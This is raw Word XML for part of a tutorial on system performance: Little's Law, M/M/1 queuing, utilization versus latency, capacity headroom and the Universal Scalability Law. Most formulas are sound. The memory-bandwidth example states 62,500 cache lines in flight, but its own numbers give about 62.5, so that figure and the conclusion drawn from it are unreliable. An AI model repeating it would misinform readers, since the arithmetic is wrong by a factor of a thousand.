    <w:p w14:paraId="742FBF9D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Ten times more in-flight requests consuming ten times more memory, connections, and threads. A latency spike from one downstream dependency doesn't just hurt latency — it causes resource exhaustion throughout the calling system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D6E5D1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Implication 3 — Throughput is bounded by concurrency / latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> A thread pool with 100 threads, each handling one request, with 100ms average service time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B5F76" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CA1838" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>λ = L / W = 100 / 0.1 = 1,000 RPS maximum throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690FFAD3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>To double throughput to 2,000 RPS without changing concurrency (100 threads), latency must halve to 50ms. To double throughput while maintaining latency, double the concurrency (200 threads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251672BB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Little's Law at the Hardware Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C2FFF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Little's Law applies at every layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A2F17" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU instruction pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD5CF3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A396B8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Pipeline depth (L) = 20 stages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD9CC6A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Clock rate (λ) = 3 GHz = 3,000,000,000 instructions/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3183C17F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>W = L / λ = 20 / 3,000,000,000 = 6.7 nanoseconds per instruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A2E773" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The CPU must keep 20 instructions in flight simultaneously to achieve 3 GHz throughput. Branch mispredictions flush the pipeline — suddenly L=0, and throughput drops to near zero while the pipeline refills.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5295F71A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E356F7E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430326D0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Memory bandwidth (λ) = 50 GB/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF4E4EF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Cache line size (unit of work) = 64 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFF89D4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>DRAM latency (W) = 80ns = 0.00000008s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19575E2A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="47C4240F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>L = λ × W = (50,000,000,000 / 64) × 0.00000008 = 62,500 cache lines in flight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA83322" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The memory controller must maintain ~62,500 outstanding cache line requests to saturate 50 GB/s bandwidth. This is why memory systems use </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>out-of-order memory access</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>memory-level parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> — issuing many memory requests before waiting for any to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BE7778" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="59CE83E8">
          <v:rect id="_x0000_i5197" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FA0172" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. The Queuing Theory Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C165DDC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Systems Have Queues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011BAD0C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Any system with variable arrival rates and variable service times develops queues — even if average arrival rate is below service capacity. This is the central insight of queuing theory and the reason latency behaves non-linearly with load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCA5D09" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The M/M/1 queue model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775FD42B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The simplest queuing model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325B8047" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> — Markovian (Poisson) arrivals: random, memoryless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B54EF64" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> — Markovian (exponential) service times: random, memoryless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0470DA19" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1437"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> — single server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786BB3D7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Key results for M/M/1 with arrival rate λ and service rate μ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF393D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA3B5FF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Utilization:         ρ = λ/μ   (must be &lt; 1 for stability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F89D380" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="2583A381" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Average queue length: Lq = ρ² / (1 - ρ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462442B6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="78201874" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Average wait time:   Wq = ρ / (μ × (1 - ρ))    (time waiting, not including service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02572044" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="637D8992" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Average total time:  W = 1 / (μ × (1 - ρ))      (wait + service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6213A112" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The non-linear latency curve — the most important result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26172A20" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B7C765" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>W = 1 / (μ × (1 - ρ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62694941" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="7C2C1B1A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>At ρ=0.5 (50% utilization):  W = 1/(μ × 0.5) = 2/μ   → 2× service time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4318A224" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>At ρ=0.8 (80% utilization):  W = 1/(μ × 0.2) = 5/μ   → 5× service time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231115EC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>At ρ=0.9 (90% utilization):  W = 1/(μ × 0.1) = 10/μ  → 10× service time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6182C637" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>At ρ=0.95 (95% utilization): W = 1/(μ × 0.05) = 20/μ → 20× service time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FB10C2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>At ρ→1.0 (100% utilization): W → ∞                    → infinite latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABEC814" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is the fundamental non-linear relationship between utilization and latency.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> At 50% utilization, latency is only 2× the service time. At 90% utilization, latency is 10× the service time. At 95% utilization, 20×. Approaching 100% utilization, latency grows without bound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340E8CCB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters for system design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3C264F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Running a system at 80% CPU utilization seems efficient — 80% of capacity is being used productively. But the M/M/1 model says latency at 80% is 5× baseline. At 90%, it's 10× baseline. Real systems are not M/M/1, but they exhibit the same qualitative behavior: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>latency grows super-linearly with utilization as the system approaches saturation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77966103" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The consequence for capacity planning:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Systems must be provisioned to run at 50–70% utilization under normal load, leaving 30–50% headroom. This headroom is not waste — it is the buffer that prevents latency from entering the non-linear regime when traffic spikes, when downstream services slow down, or when background work competes with foreground requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F14B8C2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The USL (Universal Scalability Law)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3900D04E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Neil Gunther's </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Universal Scalability Law</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> models how throughput scales with the number of concurrent workers (threads, processes, nodes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F441467" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CFABFB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>X(N) = N × X(1) / (1 + α(N-1) + βN(N-1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370579B3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="681AA6BC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>X(N) = throughput with N workers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617B6AEA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>X(1) = throughput with 1 worker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C16D12" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>α    = contention coefficient (serialization overhead — lock contention, single-threaded bottleneck)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5582321D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>β    = coherence coefficient (coordination overhead — cache invalidation, distributed consensus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC975EC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>N    = number of workers (threads, nodes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BDD473" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The three scaling regimes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8C010A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Linear scaling (α=0, β=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2810BE7E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2568A3CB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>X(N) = N × X(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A60692E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Perfect scaling. Each additional worker adds full throughput. Achieved only by fully independent, shared-nothing workloads (embarrassingly parallel). Rare in practice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAFD9A9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Sub-linear scaling (α&gt;0, β=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383DFAF7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD1B604" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>X(N) = N × X(1) / (1 + α(N-1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54407A97" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Contention (lock serialization, single-threaded bottleneck) causes diminishing returns. Amdahl's Law is the special case as N→∞: throughput approaches X(1)/α — bounded by the serialized fraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABC31A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Retrograde scaling (β&gt;0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0068AAE5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A70BCA0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>X(N) = N × X(1) / (1 + α(N-1) + βN(N-1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201311F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The β term grows as N², eventually causing throughput to </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>decrease</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> as workers are added. This happens when coordination overhead exceeds the benefit of additional workers: distributed consensus with many nodes, excessive cache coherence traffic, global lock contention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C6692C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The USL explains why distributed systems don't scale linearly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BDA0F0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Adding more Kafka brokers, more Redis nodes, more database shards — each increases throughput initially but the coordination overhead (rebalancing, consensus, cross-shard transactions) introduces β, eventually causing retrograde scaling. The optimal number of nodes is where marginal throughput gain equals marginal coordination cost — often far fewer than engineers expect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3FCDE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="62A733D8">
          <v:rect id="_x0000_i5198" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="209896DC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Latency — Deep Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E030F8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency Components — The Full Decomposition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC352AA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Every measured latency is a sum of independent components, each from a different physical or logical source. Identifying which component dominates determines which intervention will help:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4722EB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27135F39" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Total Latency = Processing Time + Queuing Time + Network Time + Serialization Time</w:t>
      </w:r>
    </w:p>
